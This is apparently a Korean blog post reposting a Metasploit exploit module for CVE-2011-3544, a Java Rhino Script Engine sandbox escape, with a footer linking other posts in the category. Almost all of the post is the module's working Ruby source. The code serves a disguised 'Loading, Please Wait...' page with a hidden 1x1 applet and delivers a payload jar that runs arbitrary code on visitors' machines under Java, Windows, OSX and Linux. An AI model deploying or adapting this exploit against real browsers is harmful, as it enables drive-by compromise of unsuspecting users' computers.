[Remote Exploits] Java Applet Rhino Script Engine Remote Code Execution
Hello_World!/오라절친_JSP 2011. 12. 1. 08:57## |
# This file is part of the Metasploit Framework and may be subject to |
# redistribution and commercial restrictions. Please see the Metasploit |
# Framework web site for more information on licensing and terms of use. |
# http://metasploit.com/framework/ |
## |
|
require 'msf/core' |
require 'rex' |
|
class Metasploit3 < Msf::Exploit::Remote |
Rank = ExcellentRanking |
|
include Msf::Exploit::Remote::HttpServer::HTML |
|
def initialize( info = {} ) |
super( update_info( info, |
'Name' => 'Java Applet Rhino Script Engine Remote Code Execution', |
'Description' => %q{ |
This module exploits a vulnerability in the Rhino Script Engine that |
can be used by a Java Applet to run arbitrary Java code outside of |
the sandbox. The vulnerability affects version 7 and version 6 update |
27 and earlier, and should work on any browser that supports Java |
(for example: IE, Firefox, Google Chrome, etc) |
}, |
'License' => MSF_LICENSE, |
'Author' => |
[ |
'Michael Schierl', # Discovery |
'juan vazquez', # metasploit module |
'Edward D. Teach <teach@consortium-of-pwners.net>', |
'sinn3r' |
], |
'References' => |
[ |
[ 'CVE', '2011-3544' ], |
[ 'OSVDB', '76500' ], # 76500 and 76499 have contents mixed |
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-305/' ], |
[ 'URL', 'http://schierlm.users.sourceforge.net/CVE-2011-3544.html' ], |
], |
'Platform' => [ 'java', 'win', 'linux' ], |
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, |
'Targets' => |
[ |
[ 'Generic (Java Payload)', |
{ |
'Arch' => ARCH_JAVA, |
} |
], |
[ 'Windows Universal', |
{ |
'Arch' => ARCH_X86, |
'Platform' => 'win' |
} |
], |
[ 'Apple OSX', |
{ |
'ARCH' => ARCH_X86, |
'Platform' => 'osx' |
} |
], |
[ 'Linux x86', |
{ |
'Arch' => ARCH_X86, |
'Platform' => 'linux' |
} |
] |
], |
'DefaultTarget' => 0, |
'DisclosureDate' => 'Oct 18 2011' |
)) |
end |
|
|
def on_request_uri( cli, request ) |
if not request.uri.match(/\.jar$/i) |
if not request.uri.match(/\/$/) |
send_redirect(cli, get_resource() + '/', '') |
return |
end |
|
print_status("#{self.name} handling request from #{cli.peerhost}:#{cli.peerport}...") |
|
send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) |
return |
end |
|
paths = [ |
[ "Exploit.class" ] |
] |
|
p = regenerate_payload(cli) |
|
jar = p.encoded_jar |
paths.each do |path| |
1.upto(path.length - 1) do |idx| |
full = path[0,idx].join("/") + "/" |
if !(jar.entries.map{|e|e.name}.include?(full)) |
jar.add_file(full, '') |
end |
end |
fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2011-3544", path ), "rb") |
data = fd.read(fd.stat.size) |
jar.add_file(path.join("/"), data) |
fd.close |
end |
|
print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." ) |
send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) |
|
handler( cli ) |
end |
|
def generate_html |
html = "<html><head><title>Loading, Please Wait...</title></head>" |
html += "<body><center><p>Loading, Please Wait...</p></center>" |
html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">" |
html += "</applet></body></html>" |
return html |
end |
|
'Hello_World! > 오라절친_JSP' 카테고리의 다른 글
| 관리자 페이지 IP 제한 (0) | 2011.08.11 |
|---|---|
| Hello World in JSP (0) | 2011.08.11 |
